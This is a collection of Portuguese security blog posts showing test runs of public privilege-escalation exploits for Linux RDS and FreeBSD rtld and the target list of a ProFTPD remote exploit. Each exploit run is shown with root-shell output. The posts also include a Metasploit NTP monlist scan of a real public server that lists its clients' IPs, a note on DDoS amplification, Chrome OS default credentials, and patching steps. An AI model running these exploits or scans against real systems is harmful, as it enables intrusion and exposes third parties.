b0telh0…

By: Kingcope
http://www.exploit-db.com/exploits/15449/

Fiz um teste no:
FreeBSD 8.1 i386, ProFTPD 1.3.3a
FreeBSD 8.0 i386, ProFTPD 1.3.2a

root@bt:/tmp# perl 15449.pl
written by kingcope
usage:
proremote.pl

[0] FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)
[1] FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)
[2] Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)
[3] Debian GNU/Linux 5.0, ProFTPD 1.3.3 Server (Plesk binary)
[4] Debian GNU/Linux 4.0, ProFTPD 1.3.2e Server (Plesk binary)
[5] Debian Linux Squeeze/sid, ProFTPD 1.3.3a Server (distro binary)
[6] SUSE Linux 9.3, ProFTPD 1.3.2e Server (Plesk binary)
[7] SUSE Linux 10.0/10.3, ProFTPD 1.3.2e Server (Plesk binary)
[8] SUSE Linux 10.2, ProFTPD 1.3.2e Server (Plesk binary)
[9] SUSE Linux 11.0, ProFTPD 1.3.2e Server (Plesk binary)
[10] SUSE Linux 11.1, ProFTPD 1.3.2e Server (Plesk binary)
[11] SUSE Linux SLES 10, ProFTPD 1.3.2e Server (Plesk binary)
[12] CentOS 5, ProFTPD 1.3.2e Server (Plesk binary)

fbsd 8.0:

fbsd 8.1:

Abs!

—————–
Advisory Name: Linux RDS Protocol Local Privilege Escalation
Release Date: 2010-10-19
Application: Linux Kernel
Versions: 2.6.30 – 2.6.36-rc8
Severity: High
Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com >
Vendor Status: Patch Released
CVE Candidate: CVE-2010-3904
—————–

Recommendation:

Users should install updates provided by downstream distributions or apply the committed patch and recompile their kernel.
Preventing the RDS kernel module from loading is an effective workaround. This can be accomplished by executing the following command as root:

echo “alias net-pf-21 off” > /etc/modprobe.d/disable-rds

Proof-of-Concept Exploit:

http://www.vsecurity.com/download/tools/linux-rds-exploit.c

Testing:

b0t@snow:/tmp$ gcc -o rds linux-rds-exploit.c
b0t@snow:/tmp$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xffffffffa0aab8c0
[+] Resolved rds_ioctl to 0xffffffffa0aa4000
[+] Resolved commit_creds to 0xffffffff810863b0
[+] Resolved prepare_kernel_cred to 0xffffffff81086880
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Got root!
# uname -a
Linux snow 2.6.35-22-generic #34-Ubuntu SMP Sun Oct 10 09:26:05 UTC 2010 x86_64 GNU/Linux
# id
uid=0(root) gid=0(root) groups=0(root)
#

Reference:

http://www.vsecurity.com/resources/advisory/20101019-1/

Depois que o HD Moore liberou essa ferramenta no final de semana, a festa durante os dias seguintes tem sido grande…
A cada F5 que se dá no http://www.exploit-db.com/ é um software novo que aparece heeheh :)

Resolvi fazer um vídeo mostrando o uso da ferramenta…

Mais informações podem ser verificadas aqui:
http://blog.metasploit.com/2010/08/better-faster-stronger.html e aqui http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

Até mais!

Esse post é um ctrl+c, ctrl+v de um post introdutório sobre o SecurityBSD feito pelo Matthew Hughes.
Quando eu vi o anuncio do projeto, achei interessante, entrei em contato com ele e resolvi fazer parte do mesmo. Espero que o projeto vá pra frente e que a comunidade contribua bastante também.
Criei uma área só sobre o SecurityBSD, que pode ser acessada em http://www.leonardobotelho.com/blog/securitybsd/. Lá estarei postando atualizações do projeto conforme elas forem aparecendo.

Introducing SecurityBSD

We’re all familiar with the FreeBSD operating system. It’s a powerful, UNIX based operating system that is secure, stable with a low memory footprint. Introducing SecurityBSD. SecurityBSD is a bundling of the FreeBSD operating system with open source security tools aimed at computer security profesionals and enthusiasts, and intends to be a serious contender to the more popular security Linux distributions such as Backtrack Linux, Weaknet Linux and SamuraiWTF.

SecurityBSD can be used on your old beige-box or on the latest computer hardware, it really doesn’t matter. One of the advantages of SecurityBSD is that it is lightweight, and can be used on legacy machines, which will be ideal for enterprises with a small IT security budget, especially in the developing world.

In its current incarnation, there is little to no customization to reflect that it is, in fact, a distribution independent of FreeBSD. It retains FreeBSD branding and the modifications are limited to installations of NMAP and Metasploit. This is an extremely early showcase of what I’m yearning towards with regards to the development of this BSD distribution. Future editions will contain the SecurityBSD project branding and will contain a wide range of security tools.

I’m pretty excited about the development of SecurityBSD, as it offers me an opportunity to learn more about the security tools which my career will be based upon and UNIX, and I’ve got high hopes for it.

A virtualbox appliance will be posted online in a few days, and I hope that you, the computer security and FreeBSD community approach this project with the same level of enthusiasm that I have for this project, and turn it in to a viable security auditing tool.

Finally, I’d like to express my deepest gratitude to the hundreds who have contributed code to the FreeBSD project and made it possible for me to make SecurityBSD.

Matthew Hughes

Abs!

Estava dando uma olhada no blog do carnal0wnage essa semana, e li sobre um novo auxiliary module que o HD Moore tinha liberado… ntp_monlist

é legal, porque ele faz uma consulta para servidores NTP e lista os últimos IPs dos clientes. O blog também faz um referencia a um post no blog da SensePost… Eles fizeram outros testes utilizando a ferramenta maltego por exemplo e alguns comentários interessantes:

Have data, what now?
The most immediate application of this method will probably be more revealing footprinting exercises. For example:

Certain devices are pre-configured to use a certain ntp server, which one can query to find all those devices

Certain products are pre-configured in a similar fashion, eg. Ubuntu

NTP servers could leak internal network details and possible one of their other addresses(IPV6 or another network if multihomed)

IPs that will never show up in customary rDNS and fDNS queries may now suddenly pop up

Bandwidth implications: So we know that a busy server’s ‘client cache’ will have 600 entries and wireshark tells us that each result packet is 468 bytes (IP+UDP+NTP). Each result packet only contains 6 results so one is looking at +- 45kbytes of data for each request packet of 220 bytes (IP+UDP+NTP). The NTP server will just dump the data so you will need a sizeable down-link to catch all 100 UDP packets. Moore mentioned that he has developed a technique to create a 30 gigabit/sec DDOS which is not easy to defend against. Our bet is that spoofing the source address of the monlist request may be a way for creating a DDOS attack.

Testando o módulo e manualmente..

Metasploit:

msf > use auxiliary/scanner/ntp/ntp_monlist
msf auxiliary(1mntp_monlist) > set RHOSTS a.ntp.br
RHOSTS => a.ntp.br
msf auxiliary(1mntp_monlist) > run

[*] Sending probes to 200.160.0.8->200.160.0.8 (1 hosts)
[*] 200.160.0.8:123 201.48.104.130:12559 (200.160.0.8)
[*] 200.160.0.8:123 201.28.104.202:247 (200.160.0.8)
[*] 200.160.0.8:123 201.72.252.178:40 (200.160.0.8)
[*] 200.160.0.8:123 201.16.68.16:1025 (200.160.0.8)
[*] 200.160.0.8:123 189.86.112.61:123 (200.160.0.8)
…
[*] 200.160.0.8:123 187.12.217.250:57265 (200.160.0.8)
[*] 200.160.0.8:123 187.16.138.10:123 (200.160.0.8)
[*] 200.160.0.8:123 187.16.241.3:55101 (200.160.0.8)
[*] 200.160.0.8:123 189.115.138.116:1626 (200.160.0.8)
[*] 200.160.0.8:123 201.70.200.170:123 (200.160.0.8)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

ntpdc:

root@bt:~# ntpdc -c monlist a.ntp.br
remote address port local address count m ver code avgint lstint
===============================================================================
187.59.59.152.static.h 59959 200.160.0.8 12 7 2 1b0 0 0 (oh eu aqui rsrsr)
200.99.150.227 100 200.160.0.8 11267899 1 3 1b0 0 0
201-28-104-202.custome 337 200.160.0.8 31789 1 3 1b0 0 0
200-140-168-34.pvoce20 62834 200.160.0.8 2688898 3 3 1b0 0 0
189-108-236-228.custom 1100 200.160.0.8 1199 3 4 190 31 0
router.compel.topnet.c 2049 200.160.0.8 1209 3 3 190 10 0
c9526933.virtua.com.br 35899 200.160.0.8 1605526 1 3 1b0 0 0
nataddr.pbh.gov.br 40401 200.160.0.8 21902 3 1 1b0 0 0
189-47-237-9.dsl.teles 123 200.160.0.8 1250 1 3 190 16 0
201.72.252.178 494 200.160.0.8 16435604 1 3 1b0 0 0
201-0-210-224.dial-up. 1323 200.160.0.8 14062 3 3 190 4 0
189.2.161.130 2487 200.160.0.8 13125 6 2 1b0 0 0
firewall.magal.ind.br 25667 200.160.0.8 5866570 1 3 1b0 0 0
autopistalitoralsul36. 354 200.160.0.8 11774 1 3 1b0 0 0
189.38.69.70 30710 200.160.0.8 2 3 3 190 27 0
….

Maltego:

Abs!

Refs:
http://carnal0wnage.attackresearch.com/node/410
http://www.sensepost.com/blog/4552.html
http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html

E ai..

Essa semana eu assisti um webcast bem interessante que falava sobre pentest com o firefox. Falou sobre diversos add-ons que você poderia estar utilizando para auxiliar na realização de um pentest. Alguns são bem conhecidos e outros, pelo menos eu, não conhecia. Vale a pena dar uma conferida…

Black Hat Webcast: Pen Testing the Web with Firefox (theprez98)
Slides: http://www.scribd.com/doc/28590479/Black-Hat-Webcast-Pen-Testing-the-Web-with-Firefox

Você pode dar uma olhada também no FIRECAT (Firefox Catalog of Auditing Toolbox). É um catalogo com uma lista gigante de add-ons que podem ser instalados no firefox para dar uma turbinada no bichinho. FireCAT v1.6.2 updated…

Grande abraço!

Olá,

Depois de um certo tempo de espera, foi lançada a versão final do backtrack 4…

*http://www.offensive-security.com/blog/

BackTrack 4 Final is out and along with this release come some exciting news, updates, and developments. BackTrack 4 has been a long and steady road, with the release of a beta last year, we decided to hold off on releasing BackTrack 4 Final until it was perfected in every way shape and form.

Além das diversas atualizações que foram realizadas no sistema em si, o projeto está com uma “casa” nova, terá um novo fórum, além de outras mudanças.
Confira a nova versão aqui.

Abs!

O exploit foi publicado no exploit-db.com dia 30/11/2009 e o Security Advisory saiu dia 03/12/2009, mas não custa nada relembrar isso. :)

*Falha: Elevação de privilégios no rtld com envenenamento de ambiente. (FreeBSD Brasil)
*Sistema: FreeBSD 7.1, 7.2, 8.0
*Security Advisory: FreeBSD-SA-09:16.rtld
*Exploit: FreeBSD Run-Time Link-Editor Local

Testar o exploit é extremamente simples.
Logado com um usuário não privilegiado, baixe e execute o exploit…

$ uname -a
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
$ ./bsd.sh
bsd.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in function ‘strcpy’
env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#
# id
uid=1001(b0t) gid=1001(b0t) euid=0(root) groups=1001(b0t)

Caso ainda não tenha atualizado o seu Sistema, é só realizar o procedimento do Security Advisory ou usar o freebsd-update.

(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch
(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc
(root@fbsd8) /tmp# cd /usr/src/
(root@fbsd8) /usr/src# patch < /tmp/rtld.patch
(root@fbsd8) /usr/src# cd /usr/src/libexec/rtld-elf/
(root@fbsd8) /usr/src/libexec/rtld-elf# make obj && make depend && make && make install

ou

(root@fbsd8) ~# freebsd-update fetch install

Depois é só testar o exploit novamente…

$ uname -a
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
$
$ ./bsd.sh
bsd.sh env env.c program.c program.o w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in function ‘strcpy’
env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; aborting
$
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)

Abs!

Nossa.. saiu em tantos lugares a notícia, que fiquei curioso e dei uma olhada no Google Chrome OS :)
Primeiro criei um usuário e baixei a imagem em http://gdgt.com/google/chrome-os/download/. Depois rodei a imagem em um Mac com o VirtualBox, e tentei de diversas maneiras entrar no sistema com a minha conta do google. Sem sucesso!

Após dar uma “googleada”, consegui logar com o usuário chronos (sem senha) no sistema:

Agora você pode entrar com a sua conta do google e utilizar o sistema normalmente.

Podemos também fazer alguma coisa meio n00b, mas que não deixa de ser mais divertido do que abrir o seu e-mail, calendário e etc :P
Como podemos ver, não temos nenhum serviço “básico” rodando por padrão:

~# nmap 192.168.1.115

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-23 01:27 BRST
Interesting ports on 192.168.1.115:
Not shown: 999 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
MAC Address: 00:25:00:48:D2:1E (Apple)

Nmap done: 1 IP address (1 host up) scanned in 11.40 seconds

Agora no Chrome OS.. teclamos ctrl+alt+t e teremos acesso ao terminal. Digitamos “sudo su” e a senha “chronos” para logar com o usuário privilegiado.
Com isso, podemos habilitar o serviço de SSH por exemplo:

/etc/init.d/ssh start

… e depois executar novamente o nmap para confirmar que o serviço está rodando.

~# nmap 192.168.1.115

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-23 02:04 BRST
Interesting ports on 192.168.1.115:
Not shown: 999 filtered ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:25:00:48:D2:1E (Apple)

Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds

Agora é usar mais o sistema e aguardar por novas versões do mesmo.
É isso ai.. Abs :D

Olá!
Bom, como são notícias de utilidade pública.. merecem um post :)

Após algum tempo sem atualização, o milw0rm.com terá o seu lugar “tomado” por outro site.
O pessoal da Offensive Security e da Gerix.it irão manter esse novo repositório de exploits. Segundo palavras deles, “We’ve recreated the milw0rm database, updated it and are now accepting submissions.”
O design/organização do site é excelente e além do próprio exploit, é possível também baixar a versão vulnerável do software. O site possui as mesmas áreas que o milw0rm: Remote Exploits, Local Exploits, Web Applications, DoS/PoC, Shellcode e Papers.
Good Job! :D

http://exploits.offensive-security.com/
http://twitter.com/exploitdb/
#exploitdb

–

Agora sobre o metasploit, a versão 3.3 foi liberada.
Essa versão inclui 446 exploits, 216 auxiliary modules, centenas de payloads e roda em todos os sistemas operacionais mais modernos, incluindo Linux, Windows, Mac OS X e BSDs.

Diversas correções e melhorias foram feitas desde a versão 3.2:

*The Windows installation now includes a fully-functional console interface…
*The Linux installers now include everything needed to run the Metasploit Framework…
*The Metasploit Console now indicates how many days have passed since the last update…
*The console now supports and enables ANSI colors by default…
*The database functionality is now enabled by default…
*Oracle exploit support has been implemented…
*All TCP-based exploits can now be launched through SOCKS4, SOCKS5, and HTTP proxies…
*Metasploit now supports 64-bit Windows as a target platform…
*Support for JSP payloads has been integrated…

e muitas outras excelentes coisas.

Agora é só sair testando e se divertindo :)

http://blog.metasploit.com/
#metasploit

Abs!